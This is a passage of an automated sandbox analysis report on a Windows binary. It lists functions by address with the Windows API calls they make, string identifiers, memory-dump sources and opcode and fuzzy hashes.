                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                        • String ID: Line:
                                                                                                                        • API String ID: 2289894680-1585850449
                                                                                                                        • Opcode ID: 7b21a59f2bbdabd82158cd76a6e176f9ba1b2d088493ab60c7c78796a8f37bb9
                                                                                                                        • Instruction ID: 37012539bff7429e0e1a0e8109a5fc8a43f79459d6da61c8ef5df5daa4e78fbd
                                                                                                                        • Opcode Fuzzy Hash: 7b21a59f2bbdabd82158cd76a6e176f9ba1b2d088493ab60c7c78796a8f37bb9
                                                                                                                        • Instruction Fuzzy Hash: 2431E271408301AAE325EB20DC59BEBBFD8BF94710F100D2AF59993091EB709688C7C6
                                                                                                                        Function 0057286B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00572884
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005728B6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: b9468d4047b7c0f4a52a9b2c9a6658e8583dcbc13cca7c2751b4b8d903be8d7d
                                                                                                                        • Instruction ID: 9dd857f3e97108c26290d5ebb63fb2df0d8d8937b88a63b08d92287497720df0
                                                                                                                        • Opcode Fuzzy Hash: b9468d4047b7c0f4a52a9b2c9a6658e8583dcbc13cca7c2751b4b8d903be8d7d
                                                                                                                        • Instruction Fuzzy Hash: F521F832E00215ABDB11AF949484DFFBFB9FFD9710F048019FA19A7290EA709D85D7A0
                                                                                                                        Function 00573BC4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00573D03: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00573D18
                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00573C23
                                                                                                                        • _strlen.LIBCMT ref: 00573C2E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout_strlen
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 2777139624-2594219639
                                                                                                                        • Opcode ID: f072b9cbe303e0018565ba7de4b9af6c24ee230cd675ca764296783990ea03fd
                                                                                                                        • Instruction ID: ec8b3c425d6e694a590ec873b05d40fdb49f31fea563be55ad4452e1640f51e5
                                                                                                                        • Opcode Fuzzy Hash: f072b9cbe303e0018565ba7de4b9af6c24ee230cd675ca764296783990ea03fd
                                                                                                                        • Instruction Fuzzy Hash: E71130317001126BDB266E78B8869FE7F6CBF85B50F00403DF50AAB182DE108E42B7D0
                                                                                                                        Function 005A336F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057ED19: GetLocalTime.KERNEL32 ref: 0057ED2A
                                                                                                                          • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057ED3B
                                                                                                                          • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057ED79
                                                                                                                          • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057EDAF
                                                                                                                          • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057EDDF
                                                                                                                          • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057EDEF
                                                                                                                          • Part of subcall function 0057ED19: _wcslen.LIBCMT ref: 0057EE2B
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 005A340A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$LocalMessageSendTime
                                                                                                                        • String ID: @U=u$SysDateTimePick32
                                                                                                                        • API String ID: 2216836867-2530228043
                                                                                                                        • Opcode ID: 47d34848f01e79e430fc8e1afdf1be764db4ff54e4bb604e6648e808eccbec20
                                                                                                                        • Instruction ID: d56fecff954e0dc10a0d46b811eda7c8beacc0688b3789bfae0d3c07b92e18e2
                                                                                                                        • Opcode Fuzzy Hash: 47d34848f01e79e430fc8e1afdf1be764db4ff54e4bb604e6648e808eccbec20
                                                                                                                        • Instruction Fuzzy Hash: 59210A313442096FEF219E54DC85FEE7BAAFB55758F10451AF940AB1D0DAB1EC409750
                                                                                                                        Function 0057215F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00572178
                                                                                                                          • Part of subcall function 0057B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0057B355
                                                                                                                          • Part of subcall function 0057B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B365
                                                                                                                          • Part of subcall function 0057B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B37B
                                                                                                                          • Part of subcall function 0057B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721D0,?,?,00000034,00000800,?,00000034), ref: 0057B42D
                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 005721DF
                                                                                                                          • Part of subcall function 0057B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0057B3F8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 1045663743-2594219639
                                                                                                                        • Opcode ID: 67ef43a38c8765ba12b601e5f4128d2356a474826d99bd87b7fbe185380de315
                                                                                                                        • Instruction ID: d3e39accd3300eba11ac4ced8540ee6527ff54ac3f772aebea34cd20cc5e5988
                                                                                                                        • Opcode Fuzzy Hash: 67ef43a38c8765ba12b601e5f4128d2356a474826d99bd87b7fbe185380de315
                                                                                                                        • Instruction Fuzzy Hash: 28219D31901129ABEF11EBA8EC45FDDBFB8FF48310F1041A5F658A7190EA705A84DF90
                                                                                                                        Function 005A31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 005A327C
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A3287
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: Combobox
                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                        • Opcode ID: 15a5f86fe614abad92210b838aafd138aa582b47e32194301fab63345ff049fc
                                                                                                                        • Instruction ID: 2066e20eb525f80fa94064adbde64d5f5ed8f3dafd71121173266e5b07c47926
                                                                                                                        • Opcode Fuzzy Hash: 15a5f86fe614abad92210b838aafd138aa582b47e32194301fab63345ff049fc
                                                                                                                        • Instruction Fuzzy Hash: CF11D0752002086FEF219E94DC84FBF3F6AFF9A3A8F100125F9189B290D6319D5197A0
                                                                                                                        Function 005A3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0051600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
                                                                                                                          • Part of subcall function 0051600E: GetStockObject.GDI32(00000011), ref: 00516060
                                                                                                                          • Part of subcall function 0051600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 005A377A
                                                                                                                        • GetSysColor.USER32(00000012), ref: 005A3794
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                        • Opcode ID: 43475b6a7eb57b70b17046f5870abbcdfba026bbd09eba550e85b5845f200ab2
                                                                                                                        • Instruction ID: 134114b73b3ec6008c4fdbef1b1a556f0835499b4b2661c04ee85addd2195076
                                                                                                                        • Opcode Fuzzy Hash: 43475b6a7eb57b70b17046f5870abbcdfba026bbd09eba550e85b5845f200ab2
                                                                                                                        • Instruction Fuzzy Hash: 7B1129B261020AAFDB00DFA8CC45EFE7BF8FB09354F004914F955E2250E735E9559B60
                                                                                                                        Function 005A6181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 005A61FC
                                                                                                                        • SendMessageW.USER32(?,00000194,00000000,00000000), ref: 005A6225
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 420150cdf17cefe757d04e761b83c4bf34f629b682709f51dd307fff61425017
                                                                                                                        • Instruction ID: bdf32dffbc5eb07713e8031daddf65136cf13e5d2dfc4954d7b8c773b8b620bf
                                                                                                                        • Opcode Fuzzy Hash: 420150cdf17cefe757d04e761b83c4bf34f629b682709f51dd307fff61425017
                                                                                                                        • Instruction Fuzzy Hash: 23118B79140214BAEB118F68DC59FBE3FA4FF0B314F084115FA16AA1E1D6B0DA00EA60
                                                                                                                        Function 0058CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0058CD7D
                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0058CDA6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                        • String ID: <local>
                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                        • Opcode ID: cf2ae006d965c32106c1efc617839c36901c7fc09f0c90bbf92d7c5d563d3e4c
                                                                                                                        • Instruction ID: fb1ba8f2978b495ded9addbb0a05f2c7d65b8cdca9bcddf79a4e286ef4275730
                                                                                                                        • Opcode Fuzzy Hash: cf2ae006d965c32106c1efc617839c36901c7fc09f0c90bbf92d7c5d563d3e4c
                                                                                                                        • Instruction Fuzzy Hash: A811C671206671BAD7347B668C45EE7BEACFF127A4F00462AB909A3180D7709845D7F0
                                                                                                                        Function 005A4F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,?,?,?), ref: 005A4FCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 3bc17a371502aebdf4b3092024d06ea1a6f1b39ab51e7c74ae65a8353be7fad6
                                                                                                                        • Instruction ID: 1a0d18edc71f1d8bff0a12ca91c19f3f7f48741ecab44c7e62c61703e14f8fc9
                                                                                                                        • Opcode Fuzzy Hash: 3bc17a371502aebdf4b3092024d06ea1a6f1b39ab51e7c74ae65a8353be7fad6
                                                                                                                        • Instruction Fuzzy Hash: 2D21D07AA0011AEFCB15CFA8D944CEE7BB9FB4E340B004554FA05A7320D731E921EBA0
                                                                                                                        Function 005A30D2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 005A3147
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u$button
                                                                                                                        • API String ID: 3850602802-1762282863
                                                                                                                        • Opcode ID: 0981a15d19be345295d74e2eb32e8f6d09b009208a69a59a86cf92e818a12b20
                                                                                                                        • Instruction ID: 39e5dc0ff028042cd562b247b2eebb74260e3ab06acd6d9723bf35fd831bf0c2
                                                                                                                        • Opcode Fuzzy Hash: 0981a15d19be345295d74e2eb32e8f6d09b009208a69a59a86cf92e818a12b20
                                                                                                                        • Instruction Fuzzy Hash: 3711E132250209ABDF118F64DC41FEB3FAAFB4A358F100124FA54A7190D776E8A1EB50
                                                                                                                        Function 00576C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 00576CB6
                                                                                                                        • _wcslen.LIBCMT ref: 00576CC2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                        • String ID: STOP
                                                                                                                        • API String ID: 1256254125-2411985666
                                                                                                                        • Opcode ID: 48ef831d5bccab33e5c52a4888385ecd87bd05b936b692faa66cfa2d71c84213
                                                                                                                        • Instruction ID: 3d49b2ca4b2bfd66e2ba967bda0ef6c6f227092774e8f1505fe71e82b8efa2d0
                                                                                                                        • Opcode Fuzzy Hash: 48ef831d5bccab33e5c52a4888385ecd87bd05b936b692faa66cfa2d71c84213
                                                                                                                        • Instruction Fuzzy Hash: C30104326109278ACB219FBDEC849FF3FA8FAA1710B504924E85697190EB31DD40D650
                                                                                                                        Function 005723DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721D0,?,?,00000034,00000800,?,00000034), ref: 0057B42D
                                                                                                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 0057243B
                                                                                                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 0057245E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MemoryProcessWrite
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 1195347164-2594219639
                                                                                                                        • Opcode ID: 08499648fdb551bddc06d76727bcc1eb3abd1e04aac6184b2b223bdf5662e702
                                                                                                                        • Instruction ID: fc5458c6b9af3a4a42e2660065c32ef29c0296f9ca96c8e48b67f4a74b603041
                                                                                                                        • Opcode Fuzzy Hash: 08499648fdb551bddc06d76727bcc1eb3abd1e04aac6184b2b223bdf5662e702
                                                                                                                        • Instruction Fuzzy Hash: B5019B32900119ABEF11AF64EC4AFEEBF79EB14310F108166F529AB0D1DB705D45DB60
                                                                                                                        Function 005A4366 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000133E,00000000,?), ref: 005A43AF
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?), ref: 005A4408
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateMessageRectSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 909852535-2594219639
                                                                                                                        • Opcode ID: b6e398d099f906f30004cfb44f7d4d991f09e53644f4b6d524259d1addf37c33
                                                                                                                        • Instruction ID: 19f69837eb35b9f54b8596ddf915e8c132b39976fd5f1826d9de642b47a9ea70
                                                                                                                        • Opcode Fuzzy Hash: b6e398d099f906f30004cfb44f7d4d991f09e53644f4b6d524259d1addf37c33
                                                                                                                        • Instruction Fuzzy Hash: BE11C430500744AFEB21CF78C491BEBBBE4BF56310F10491DE9AB5B281DB706945DB60
                                                                                                                        Function 0057250B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00572531
                                                                                                                        • SendMessageW.USER32(?,0000040D,?,00000000), ref: 00572564
                                                                                                                          • Part of subcall function 0057B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0057B3F8
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MemoryProcessRead_wcslen
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 1083363909-2594219639
